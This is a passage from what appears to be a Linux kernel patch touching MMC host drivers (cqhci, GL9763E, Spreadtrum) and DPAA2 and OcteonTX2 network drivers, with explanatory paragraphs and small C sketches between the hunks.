+-		cqcfg = cqhci_readl(cq_host, CQHCI_CFG);
+-		cqcfg &= ~CQHCI_ENABLE;
+-		cqhci_writel(cq_host, cqcfg, CQHCI_CFG);
+-		cqcfg |= CQHCI_ENABLE;
+-		cqhci_writel(cq_host, cqcfg, CQHCI_CFG);
+-		/* Be sure that there are no tasks */
+-		ok = cqhci_halt(mmc, CQHCI_FINISH_HALT_TIMEOUT);
+-		if (!cqhci_clear_all_tasks(mmc, CQHCI_CLEAR_TIMEOUT))
+-			ok = false;
+-		WARN_ON(!ok);
+-	}
++	if (!cqhci_clear_all_tasks(mmc, CQHCI_CLEAR_TIMEOUT))
++		ok = false;
++
++	/* Disable to make sure tasks really are cleared */
++	cqcfg = cqhci_readl(cq_host, CQHCI_CFG);
++	cqcfg &= ~CQHCI_ENABLE;
++	cqhci_writel(cq_host, cqcfg, CQHCI_CFG);
++
++	cqcfg = cqhci_readl(cq_host, CQHCI_CFG);
++	cqcfg |= CQHCI_ENABLE;
++	cqhci_writel(cq_host, cqcfg, CQHCI_CFG);
++
++	cqhci_halt(mmc, CQHCI_FINISH_HALT_TIMEOUT);
++
++	if (!ok)
++		cqhci_clear_all_tasks(mmc, CQHCI_CLEAR_TIMEOUT);
+ 
+ 	cqhci_recover_mrqs(cq_host);
+ 
+diff --git a/drivers/mmc/host/sdhci-pci-gli.c b/drivers/mmc/host/sdhci-pci-gli.c
+index 33d7039c19169..3b5b5c139206d 100644
+--- a/drivers/mmc/host/sdhci-pci-gli.c
++++ b/drivers/mmc/host/sdhci-pci-gli.c
+@@ -801,6 +801,32 @@ static void gl9763e_hs400_enhanced_strobe(struct mmc_host *mmc,
+ 	sdhci_writel(host, val, SDHCI_GLI_9763E_HS400_ES_REG);
+ }
+ 
++static void gl9763e_set_low_power_negotiation(struct sdhci_pci_slot *slot,
++					      bool enable)
++{
++	struct pci_dev *pdev = slot->chip->pdev;
++	u32 value;
++
++	pci_read_config_dword(pdev, PCIE_GLI_9763E_VHS, &value);
++	value &= ~GLI_9763E_VHS_REV;
++	value |= FIELD_PREP(GLI_9763E_VHS_REV, GLI_9763E_VHS_REV_W);
++	pci_write_config_dword(pdev, PCIE_GLI_9763E_VHS, value);
++
++	pci_read_config_dword(pdev, PCIE_GLI_9763E_CFG, &value);
++
++	if (enable)
++		value &= ~GLI_9763E_CFG_LPSN_DIS;
++	else
++		value |= GLI_9763E_CFG_LPSN_DIS;
++
++	pci_write_config_dword(pdev, PCIE_GLI_9763E_CFG, value);
++
++	pci_read_config_dword(pdev, PCIE_GLI_9763E_VHS, &value);
++	value &= ~GLI_9763E_VHS_REV;
++	value |= FIELD_PREP(GLI_9763E_VHS_REV, GLI_9763E_VHS_REV_R);
++	pci_write_config_dword(pdev, PCIE_GLI_9763E_VHS, value);
++}
++
+ static void sdhci_set_gl9763e_signaling(struct sdhci_host *host,
+ 					unsigned int timing)
+ {
+@@ -909,6 +935,9 @@ static int gl9763e_add_host(struct sdhci_pci_slot *slot)
+ 	if (ret)
+ 		goto cleanup;
+ 
++	/* Disable LPM negotiation to avoid entering L1 state. */
++	gl9763e_set_low_power_negotiation(slot, false);
++
+ 	return 0;
+ 
+ cleanup:
+@@ -960,31 +989,6 @@ static void gli_set_gl9763e(struct sdhci_pci_slot *slot)
+ }
+ 
+ #ifdef CONFIG_PM
+-static void gl9763e_set_low_power_negotiation(struct sdhci_pci_slot *slot, bool enable)
+-{
+-	struct pci_dev *pdev = slot->chip->pdev;
+-	u32 value;
+-
+-	pci_read_config_dword(pdev, PCIE_GLI_9763E_VHS, &value);
+-	value &= ~GLI_9763E_VHS_REV;
+-	value |= FIELD_PREP(GLI_9763E_VHS_REV, GLI_9763E_VHS_REV_W);
+-	pci_write_config_dword(pdev, PCIE_GLI_9763E_VHS, value);
+-
+-	pci_read_config_dword(pdev, PCIE_GLI_9763E_CFG, &value);
+-
+-	if (enable)
+-		value &= ~GLI_9763E_CFG_LPSN_DIS;
+-	else
+-		value |= GLI_9763E_CFG_LPSN_DIS;
+-
+-	pci_write_config_dword(pdev, PCIE_GLI_9763E_CFG, value);
+-
+-	pci_read_config_dword(pdev, PCIE_GLI_9763E_VHS, &value);
+-	value &= ~GLI_9763E_VHS_REV;
+-	value |= FIELD_PREP(GLI_9763E_VHS_REV, GLI_9763E_VHS_REV_R);
+-	pci_write_config_dword(pdev, PCIE_GLI_9763E_VHS, value);
+-}
+-
+ static int gl9763e_runtime_suspend(struct sdhci_pci_chip *chip)
+ {
+ 	struct sdhci_pci_slot *slot = chip->slots[0];
+diff --git a/drivers/mmc/host/sdhci-sprd.c b/drivers/mmc/host/sdhci-sprd.c
+index 525f979e2a974..2101b6e794c0e 100644
+--- a/drivers/mmc/host/sdhci-sprd.c
++++ b/drivers/mmc/host/sdhci-sprd.c
+@@ -405,12 +405,33 @@ static void sdhci_sprd_request_done(struct sdhci_host *host,
+ 	mmc_request_done(host->mmc, mrq);
+ }
+ 
++static void sdhci_sprd_set_power(struct sdhci_host *host, unsigned char mode,
++				 unsigned short vdd)
++{
++	struct mmc_host *mmc = host->mmc;
++
++	switch (mode) {
++	case MMC_POWER_OFF:
++		mmc_regulator_set_ocr(host->mmc, mmc->supply.vmmc, 0);
++
++		mmc_regulator_disable_vqmmc(mmc);
++		break;
++	case MMC_POWER_ON:
++		mmc_regulator_enable_vqmmc(mmc);
++		break;
++	case MMC_POWER_UP:
++		mmc_regulator_set_ocr(host->mmc, mmc->supply.vmmc, vdd);
++		break;
++	}
++}
++
+ static struct sdhci_ops sdhci_sprd_ops = {
+ 	.read_l = sdhci_sprd_readl,
+ 	.write_l = sdhci_sprd_writel,
+ 	.write_w = sdhci_sprd_writew,
+ 	.write_b = sdhci_sprd_writeb,
+ 	.set_clock = sdhci_sprd_set_clock,
++	.set_power = sdhci_sprd_set_power,
+ 	.get_max_clock = sdhci_sprd_get_max_clock,
+ 	.get_min_clock = sdhci_sprd_get_min_clock,
+ 	.set_bus_width = sdhci_set_bus_width,
+@@ -676,6 +697,10 @@ static int sdhci_sprd_probe(struct platform_device *pdev)
+ 	host->caps1 &= ~(SDHCI_SUPPORT_SDR50 | SDHCI_SUPPORT_SDR104 |
+ 			 SDHCI_SUPPORT_DDR50);
+ 
++	ret = mmc_regulator_get_supply(host->mmc);
++	if (ret)
++		goto pm_runtime_disable;
++
+ 	ret = sdhci_setup_host(host);
+ 	if (ret)
+ 		goto pm_runtime_disable;
+diff --git a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
+index 6383d9805dac9..b58162ce81d87 100644
+--- a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
++++ b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.c
+@@ -1043,14 +1043,12 @@ static int dpaa2_eth_build_single_fd(struct dpaa2_eth_priv *priv,
+ 	dma_addr_t addr;
+ 
+ 	buffer_start = skb->data - dpaa2_eth_needed_headroom(skb);
+-
+-	/* If there's enough room to align the FD address, do it.
+-	 * It will help hardware optimize accesses.
+-	 */
+ 	aligned_start = PTR_ALIGN(buffer_start - DPAA2_ETH_TX_BUF_ALIGN,
+ 				  DPAA2_ETH_TX_BUF_ALIGN);
+ 	if (aligned_start >= skb->head)
+ 		buffer_start = aligned_start;
++	else
++		return -ENOMEM;
+ 
+ 	/* Store a backpointer to the skb at the beginning of the buffer
+ 	 * (in the private data area) such that we can release it
+@@ -4738,6 +4736,8 @@ static int dpaa2_eth_probe(struct fsl_mc_device *dpni_dev)
+ 	if (err)
+ 		goto err_dl_port_add;
+ 
++	net_dev->needed_headroom = DPAA2_ETH_SWA_SIZE + DPAA2_ETH_TX_BUF_ALIGN;
++
+ 	err = register_netdev(net_dev);
+ 	if (err < 0) {
+ 		dev_err(dev, "register_netdev() failed\n");
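
The Tx path previously treated alignment of the frame-descriptor address as optional; it is now required, with the aligned start computed downwards into the skb headroom and the frame rejected with -ENOMEM when the headroom cannot absorb it. The probe hunk and the dpaa2-eth.h change below reserve DPAA2_ETH_SWA_SIZE + DPAA2_ETH_TX_BUF_ALIGN of needed_headroom so well-formed skbs always have the room. A simplified model of the align-down check:

#include <stddef.h>
#include <stdint.h>

/* Greatest align-aligned address at or below p (align: power of two). */
static char *align_down(char *p, size_t align)
{
	return (char *)((uintptr_t)p & ~((uintptr_t)align - 1));
}

/* Returns the aligned buffer start, or NULL (-ENOMEM in the driver)
 * when the headroom between head and data is too small. */
static char *fd_buffer_start(char *data, char *head, size_t align)
{
	char *aligned = align_down(data, align);

	return aligned >= head ? aligned : NULL;
}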
+diff --git a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.h b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.h
+index 447718483ef47..e703846adc9f0 100644
+--- a/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.h
++++ b/drivers/net/ethernet/freescale/dpaa2/dpaa2-eth.h
+@@ -702,7 +702,7 @@ static inline bool dpaa2_eth_rx_pause_enabled(u64 link_options)
+ 
+ static inline unsigned int dpaa2_eth_needed_headroom(struct sk_buff *skb)
+ {
+-	unsigned int headroom = DPAA2_ETH_SWA_SIZE;
++	unsigned int headroom = DPAA2_ETH_SWA_SIZE + DPAA2_ETH_TX_BUF_ALIGN;
+ 
+ 	/* If we don't have an skb (e.g. XDP buffer), we only need space for
+ 	 * the software annotation area
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+index 11eeb36cf9a54..a0c31f5b2ce05 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/mbox.h
+@@ -232,7 +232,7 @@ M(NPC_GET_KEX_CFG,	  0x600c, npc_get_kex_cfg,			\
+ M(NPC_INSTALL_FLOW,	  0x600d, npc_install_flow,			       \
+ 				  npc_install_flow_req, npc_install_flow_rsp)  \
+ M(NPC_DELETE_FLOW,	  0x600e, npc_delete_flow,			\
+-				  npc_delete_flow_req, msg_rsp)		\
++				  npc_delete_flow_req, npc_delete_flow_rsp)		\
+ M(NPC_MCAM_READ_ENTRY,	  0x600f, npc_mcam_read_entry,			\
+ 				  npc_mcam_read_entry_req,		\
+ 				  npc_mcam_read_entry_rsp)		\
+@@ -1471,6 +1471,8 @@ struct npc_install_flow_req {
+ 	u8  vtag0_op;
+ 	u16 vtag1_def;
+ 	u8  vtag1_op;
++	/* old counter value */
++	u16 cntr_val;
+ };
+ 
+ struct npc_install_flow_rsp {
+@@ -1486,6 +1488,11 @@ struct npc_delete_flow_req {
+ 	u8 all; /* PF + VFs */
+ };
+ 
++struct npc_delete_flow_rsp {
++	struct mbox_msghdr hdr;
++	u16 cntr_val;
++};
++
+ struct npc_mcam_read_entry_req {
+ 	struct mbox_msghdr hdr;
+ 	u16 entry;	 /* MCAM entry to read */
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index 1f3a8cf42765e..7310047136986 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -5236,6 +5236,8 @@ int rvu_mbox_handler_nix_bandprof_free(struct rvu *rvu,
+ 
+ 		ipolicer = &nix_hw->ipolicer[layer];
+ 		for (idx = 0; idx < req->prof_count[layer]; idx++) {
++			if (idx == MAX_BANDPROF_PER_PFFUNC)
++				break;
+ 			prof_idx = req->prof_idx[layer][idx];
+ 			if (prof_idx >= ipolicer->band_prof.max ||
+ 			    ipolicer->pfvf_map[prof_idx] != pcifunc)
+@@ -5249,8 +5251,6 @@ int rvu_mbox_handler_nix_bandprof_free(struct rvu *rvu,
+ 			ipolicer->pfvf_map[prof_idx] = 0x00;
+ 			ipolicer->match_id[prof_idx] = 0;
+ 			rvu_free_rsrc(&ipolicer->band_prof, prof_idx);
+-			if (idx == MAX_BANDPROF_PER_PFFUNC)
+-				break;
+ 		}
+ 	}
+ 	mutex_unlock(&rvu->rsrc_lock);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c
+index 1eb5eb29a2ba6..80d6aa3f14c11 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c
+@@ -1184,7 +1184,7 @@ find_rule:
+ 	write_req.enable_entry = (u8)enable;
+ 	/* if counter is available then clear and use it */
+ 	if (req->set_cntr && rule->has_cntr) {
+-		rvu_write64(rvu, blkaddr, NPC_AF_MATCH_STATX(rule->cntr), 0x00);
++		rvu_write64(rvu, blkaddr, NPC_AF_MATCH_STATX(rule->cntr), req->cntr_val);
+ 		write_req.set_cntr = 1;
+ 		write_req.cntr = rule->cntr;
+ 	}
+@@ -1399,12 +1399,13 @@ static int npc_delete_flow(struct rvu *rvu, struct rvu_npc_mcam_rule *rule,
+ 
+ int rvu_mbox_handler_npc_delete_flow(struct rvu *rvu,
+ 				     struct npc_delete_flow_req *req,
+-				     struct msg_rsp *rsp)
++				     struct npc_delete_flow_rsp *rsp)
+ {
+ 	struct npc_mcam *mcam = &rvu->hw->mcam;
+ 	struct rvu_npc_mcam_rule *iter, *tmp;
+ 	u16 pcifunc = req->hdr.pcifunc;
+ 	struct list_head del_list;
++	int blkaddr;
+ 
+ 	INIT_LIST_HEAD(&del_list);
+ 
+@@ -1420,6 +1421,10 @@ int rvu_mbox_handler_npc_delete_flow(struct rvu *rvu,
+ 				list_move_tail(&iter->list, &del_list);
+ 			/* single rule */
+ 			} else if (req->entry == iter->entry) {
++				blkaddr = rvu_get_blkaddr(rvu, BLKTYPE_NPC, 0);
++				if (blkaddr)
++					rsp->cntr_val = rvu_read64(rvu, blkaddr,
++								   NPC_AF_MATCH_STATX(iter->cntr));
+ 				list_move_tail(&iter->list, &del_list);
+ 				break;
+ 			}
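
These NPC changes preserve flow statistics across rule moves: NPC_DELETE_FLOW's reply becomes npc_delete_flow_rsp carrying the entry's final match counter, npc_install_flow_req gains cntr_val so a re-installed rule can be seeded with that value, and the install handler now writes req->cntr_val rather than zero when it reuses a counter. Reduced to a standalone sketch, the hand-off looks like:

struct entry {
	unsigned long long cntr;	/* hardware match counter */
};

/* Delete returns the final counter value so the caller can carry it
 * over to the replacement entry. */
static unsigned long long entry_delete(struct entry *e)
{
	unsigned long long val = e->cntr;

	e->cntr = 0;
	return val;
}

/* Install seeds the counter instead of clearing it, so statistics
 * survive an MCAM reshuffle. */
static void entry_install(struct entry *e, unsigned long long seed)
{
	e->cntr = seed;
}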
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_switch.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_switch.c
+index 3392487f6b47b..329b5a02914d7 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_switch.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_switch.c
+@@ -145,6 +145,7 @@ void rvu_switch_enable(struct rvu *rvu)
+ 	struct npc_mcam_alloc_entry_req alloc_req = { 0 };
+ 	struct npc_mcam_alloc_entry_rsp alloc_rsp = { 0 };
+ 	struct npc_delete_flow_req uninstall_req = { 0 };
++	struct npc_delete_flow_rsp uninstall_rsp = { 0 };
+ 	struct npc_mcam_free_entry_req free_req = { 0 };
+ 	struct rvu_switch *rswitch = &rvu->rswitch;
+ 	struct msg_rsp rsp;
+@@ -184,7 +185,7 @@ void rvu_switch_enable(struct rvu *rvu)
+ uninstall_rules:
+ 	uninstall_req.start = rswitch->start_entry;
+ 	uninstall_req.end =  rswitch->start_entry + rswitch->used_entries - 1;
+-	rvu_mbox_handler_npc_delete_flow(rvu, &uninstall_req, &rsp);
++	rvu_mbox_handler_npc_delete_flow(rvu, &uninstall_req, &uninstall_rsp);
+ 	kfree(rswitch->entry2pcifunc);
+ free_entries:
+ 	free_req.all = 1;
+@@ -196,6 +197,7 @@ exit:
+ void rvu_switch_disable(struct rvu *rvu)
+ {
+ 	struct npc_delete_flow_req uninstall_req = { 0 };
++	struct npc_delete_flow_rsp uninstall_rsp = { 0 };
+ 	struct npc_mcam_free_entry_req free_req = { 0 };
+ 	struct rvu_switch *rswitch = &rvu->rswitch;
+ 	struct rvu_hwinfo *hw = rvu->hw;
+@@ -232,7 +234,7 @@ void rvu_switch_disable(struct rvu *rvu)
+ 	uninstall_req.start = rswitch->start_entry;
+ 	uninstall_req.end =  rswitch->start_entry + rswitch->used_entries - 1;
+ 	free_req.all = 1;
+-	rvu_mbox_handler_npc_delete_flow(rvu, &uninstall_req, &rsp);
++	rvu_mbox_handler_npc_delete_flow(rvu, &uninstall_req, &uninstall_rsp);
+ 	rvu_mbox_handler_npc_mcam_free_entry(rvu, &free_req, &rsp);
+ 	rswitch->used_entries = 0;
+ 	kfree(rswitch->entry2pcifunc);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/cn10k.c b/drivers/net/ethernet/marvell/octeontx2/nic/cn10k.c
+index 826f691de2595..59d8d1ba15c28 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/cn10k.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/cn10k.c
+@@ -448,6 +448,9 @@ int cn10k_set_ipolicer_rate(struct otx2_nic *pfvf, u16 profile,
+ 	aq->prof.pebs_mantissa = 0;
+ 	aq->prof_mask.pebs_mantissa = 0xFF;
+ 
++	aq->prof.hl_en = 0;
++	aq->prof_mask.hl_en = 1;
++
+ 	/* Fill AQ info */
+ 	aq->qidx = profile;
+ 	aq->ctype = NIX_AQ_CTYPE_BANDPROF;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+index efd66224b3dbf..44950c2542bb7 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+@@ -339,13 +339,8 @@ struct otx2_flow_config {
+ 	struct list_head	flow_list;
+ 	u32			dmacflt_max_flows;
+ 	u16                     max_flows;
+-};
+-
+-struct otx2_tc_info {
+-	/* hash table to store TC offloaded flows */
+-	struct rhashtable		flow_table;
+-	struct rhashtable_params	flow_ht_params;
+-	unsigned long			*tc_entries_bitmap;
++	struct list_head	flow_list_tc;
++	bool			ntuple;
+ };
+ 
+ struct dev_hw_ops {
+@@ -465,7 +460,6 @@ struct otx2_nic {
+ 	/* NPC MCAM */
+ 	struct otx2_flow_config	*flow_cfg;
+ 	struct otx2_mac_table	*mac_table;
+-	struct otx2_tc_info	tc_info;
+ 
+ 	u64			reset_count;
+ 	struct work_struct	reset_task;
+@@ -1024,7 +1018,8 @@ int otx2_init_tc(struct otx2_nic *nic);
+ void otx2_shutdown_tc(struct otx2_nic *nic);
+ int otx2_setup_tc(struct net_device *netdev, enum tc_setup_type type,
+ 		  void *type_data);
+-int otx2_tc_alloc_ent_bitmap(struct otx2_nic *nic);
++void otx2_tc_apply_ingress_police_rules(struct otx2_nic *nic);
++
+ /* CGX/RPM DMAC filters support */
+ int otx2_dmacflt_get_max_cnt(struct otx2_nic *pf);
+ int otx2_dmacflt_add(struct otx2_nic *pf, const u8 *mac, u32 bit_pos);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_devlink.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_devlink.c
+index 777a27047c8e8..5f71a72f95e50 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_devlink.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_devlink.c
+@@ -41,7 +41,6 @@ static int otx2_dl_mcam_count_set(struct devlink *devlink, u32 id,
+ 		return 0;
+ 
+ 	otx2_alloc_mcam_entries(pfvf, ctx->val.vu16);
+-	otx2_tc_alloc_ent_bitmap(pfvf);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_ethtool.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_ethtool.c
+index 0eb74e8c553dd..aaf1af2a402ec 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_ethtool.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_ethtool.c
+@@ -753,6 +753,7 @@ static int otx2_set_rxnfc(struct net_device *dev, struct ethtool_rxnfc *nfc)
+ 	struct otx2_nic *pfvf = netdev_priv(dev);
+ 	int ret = -EOPNOTSUPP;
+ 
++	pfvf->flow_cfg->ntuple = ntuple;
+ 	switch (nfc->cmd) {
+ 	case ETHTOOL_SRXFH:
+ 		ret = otx2_set_rss_hash_opts(pfvf, nfc);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+index 5c4a4d3557702..5c757508322b9 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_flows.c
+@@ -276,6 +276,7 @@ int otx2vf_mcam_flow_init(struct otx2_nic *pfvf)
+ 
+ 	flow_cfg = pfvf->flow_cfg;
+ 	INIT_LIST_HEAD(&flow_cfg->flow_list);
++	INIT_LIST_HEAD(&flow_cfg->flow_list_tc);
+ 	flow_cfg->max_flows = 0;
+ 
+ 	return 0;
+@@ -298,6 +299,7 @@ int otx2_mcam_flow_init(struct otx2_nic *pf)
+ 		return -ENOMEM;
+ 
+ 	INIT_LIST_HEAD(&pf->flow_cfg->flow_list);
++	INIT_LIST_HEAD(&pf->flow_cfg->flow_list_tc);
+ 
+ 	/* Allocate bare minimum number of MCAM entries needed for
+ 	 * unicast and ntuple filters.
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index 1d2d72c60a12c..18c5d2b3f7f95 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -566,7 +566,9 @@ static irqreturn_t otx2_pfvf_mbox_intr_handler(int irq, void *pf_irq)
+ 		otx2_write64(pf, RVU_PF_VFPF_MBOX_INTX(1), intr);
+ 		otx2_queue_work(mbox, pf->mbox_pfvf_wq, 64, vfs, intr,
+ 				TYPE_PFVF);
+-		vfs -= 64;
++		if (intr)
++			trace_otx2_msg_interrupt(mbox->mbox.pdev, "VF(s) to PF", intr);
++		vfs = 64;
+ 	}
+ 
+ 	intr = otx2_read64(pf, RVU_PF_VFPF_MBOX_INTX(0));
+@@ -574,7 +576,8 @@ static irqreturn_t otx2_pfvf_mbox_intr_handler(int irq, void *pf_irq)
+ 
+ 	otx2_queue_work(mbox, pf->mbox_pfvf_wq, 0, vfs, intr, TYPE_PFVF);
+ 
+-	trace_otx2_msg_interrupt(mbox->mbox.pdev, "VF(s) to PF", intr);
++	if (intr)
++		trace_otx2_msg_interrupt(mbox->mbox.pdev, "VF(s) to PF", intr);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -1855,6 +1858,8 @@ int otx2_open(struct net_device *netdev)
+ 	if (pf->flags & OTX2_FLAG_DMACFLTR_SUPPORT)
+ 		otx2_dmacflt_reinstall_flows(pf);
+ 
++	otx2_tc_apply_ingress_police_rules(pf);
++
+ 	err = otx2_rxtx_enable(pf, true);
+ 	/* If a mbox communication error happens at this point then interface
+ 	 * will end up in a state such that it is in down state but hardware
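
The interrupt-handler hunk fixes mailbox servicing when more than 64 VFs are enabled: after the upper register bank (VFs 64 and above) is handled, the count passed to the lower bank must be exactly 64, since bank 0 always covers VFs 0-63, whereas the old `vfs -= 64` undercounted them; the tracepoints are also emitted only when an interrupt bit was actually set. The corrected split, as a reduced sketch:

/* Bank 1 covers VFs 64..numvfs-1, bank 0 covers VFs 0..63. */
static void service_bank(int bank, int first_vf, int count)
{
	(void)bank;
	(void)first_vf;
	(void)count;	/* queue per-VF mailbox work here */
}

static void handle_vf_mbox_irqs(int numvfs)
{
	int vfs = numvfs;

	if (vfs > 64) {
		service_bank(1, 64, vfs - 64);
		vfs = 64;	/* the fix: was `vfs -= 64` */
	}
	service_bank(0, 0, vfs);
}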
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c
+index 1aeb18a901b13..bb77ab7ddfefd 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c
+@@ -48,9 +48,8 @@ struct otx2_tc_flow_stats {
+ };
+ 
+ struct otx2_tc_flow {
+-	struct rhash_head		node;
++	struct list_head		list;
+ 	unsigned long			cookie;
+-	unsigned int			bitpos;
+ 	struct rcu_head			rcu;
+ 	struct otx2_tc_flow_stats	stats;
+ 	spinlock_t			lock; /* lock for stats */
+@@ -58,31 +57,13 @@ struct otx2_tc_flow {
+ 	u16				entry;
+ 	u16				leaf_profile;
+ 	bool				is_act_police;
++	u32				prio;
++	struct npc_install_flow_req	req;
++	u64				rate;
++	u32				burst;
++	bool				is_pps;
+ };
+ 
+-int otx2_tc_alloc_ent_bitmap(struct otx2_nic *nic)
+-{
+-	struct otx2_tc_info *tc = &nic->tc_info;
+-
+-	if (!nic->flow_cfg->max_flows)
+-		return 0;
+-
+-	/* Max flows changed, free the existing bitmap */
+-	kfree(tc->tc_entries_bitmap);
+-
+-	tc->tc_entries_bitmap =
+-			kcalloc(BITS_TO_LONGS(nic->flow_cfg->max_flows),
+-				sizeof(long), GFP_KERNEL);
+-	if (!tc->tc_entries_bitmap) {
+-		netdev_err(nic->netdev,
+-			   "Unable to alloc TC flow entries bitmap\n");
+-		return -ENOMEM;
+-	}
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL(otx2_tc_alloc_ent_bitmap);
+-
+ static void otx2_get_egress_burst_cfg(struct otx2_nic *nic, u32 burst,
+ 				      u32 *burst_exp, u32 *burst_mantissa)
+ {
+@@ -321,21 +302,10 @@ static int otx2_tc_egress_matchall_delete(struct otx2_nic *nic,
+ 	return err;
+ }
+ 
+-static int otx2_tc_act_set_police(struct otx2_nic *nic,
+-				  struct otx2_tc_flow *node,
+-				  struct flow_cls_offload *f,
+-				  u64 rate, u32 burst, u32 mark,
+-				  struct npc_install_flow_req *req, bool pps)
++static int otx2_tc_act_set_hw_police(struct otx2_nic *nic,
++				     struct otx2_tc_flow *node)
+ {
+-	struct netlink_ext_ack *extack = f->common.extack;
+-	struct otx2_hw *hw = &nic->hw;
+-	int rq_idx, rc;
+-
+-	rq_idx = find_first_zero_bit(&nic->rq_bmap, hw->rx_queues);
+-	if (rq_idx >= hw->rx_queues) {
+-		NL_SET_ERR_MSG_MOD(extack, "Police action rules exceeded");
+-		return -EINVAL;
+-	}
++	int rc;
+ 
+ 	mutex_lock(&nic->mbox.lock);
+ 
+@@ -345,23 +315,17 @@ static int otx2_tc_act_set_police(struct otx2_nic *nic,
+ 		return rc;
+ 	}
+ 
+-	rc = cn10k_set_ipolicer_rate(nic, node->leaf_profile, burst, rate, pps);
++	rc = cn10k_set_ipolicer_rate(nic, node->leaf_profile,
++				     node->burst, node->rate, node->is_pps);
+ 	if (rc)
+ 		goto free_leaf;
+ 
+-	rc = cn10k_map_unmap_rq_policer(nic, rq_idx, node->leaf_profile, true);
++	rc = cn10k_map_unmap_rq_policer(nic, node->rq, node->leaf_profile, true);
+ 	if (rc)
+ 		goto free_leaf;
+ 
+ 	mutex_unlock(&nic->mbox.lock);
+ 
+-	req->match_id = mark & 0xFFFFULL;
+-	req->index = rq_idx;
+-	req->op = NIX_RX_ACTIONOP_UCAST;
+-	set_bit(rq_idx, &nic->rq_bmap);
+-	node->is_act_police = true;
+-	node->rq = rq_idx;
+-
+ 	return 0;
+ 
+ free_leaf:
+@@ -373,6 +337,39 @@ free_leaf:
+ 	return rc;
+ }
+ 
++static int otx2_tc_act_set_police(struct otx2_nic *nic,
++				  struct otx2_tc_flow *node,
++				  struct flow_cls_offload *f,
++				  u64 rate, u32 burst, u32 mark,
++				  struct npc_install_flow_req *req, bool pps)
++{
++	struct netlink_ext_ack *extack = f->common.extack;
++	struct otx2_hw *hw = &nic->hw;
++	int rq_idx, rc;
++
++	rq_idx = find_first_zero_bit(&nic->rq_bmap, hw->rx_queues);
++	if (rq_idx >= hw->rx_queues) {
++		NL_SET_ERR_MSG_MOD(extack, "Police action rules exceeded");
++		return -EINVAL;
++	}
++
++	req->match_id = mark & 0xFFFFULL;
++	req->index = rq_idx;
++	req->op = NIX_RX_ACTIONOP_UCAST;
++
++	node->is_act_police = true;
++	node->rq = rq_idx;
++	node->burst = burst;
++	node->rate = rate;
++	node->is_pps = pps;
++
++	rc = otx2_tc_act_set_hw_police(nic, node);
++	if (!rc)
++		set_bit(rq_idx, &nic->rq_bmap);
++
++	return rc;
++}
++
+ static int otx2_tc_parse_actions(struct otx2_nic *nic,
+ 				 struct flow_action *flow_action,
+ 				 struct npc_install_flow_req *req,
+@@ -689,8 +686,117 @@ static int otx2_tc_prepare_flow(struct otx2_nic *nic, struct otx2_tc_flow *node,
+ 	return otx2_tc_parse_actions(nic, &rule->action, req, f, node);
+ }
+ 
+-static int otx2_del_mcam_flow_entry(struct otx2_nic *nic, u16 entry)
++static void otx2_destroy_tc_flow_list(struct otx2_nic *pfvf)
++{
++	struct otx2_flow_config *flow_cfg = pfvf->flow_cfg;
++	struct otx2_tc_flow *iter, *tmp;
++
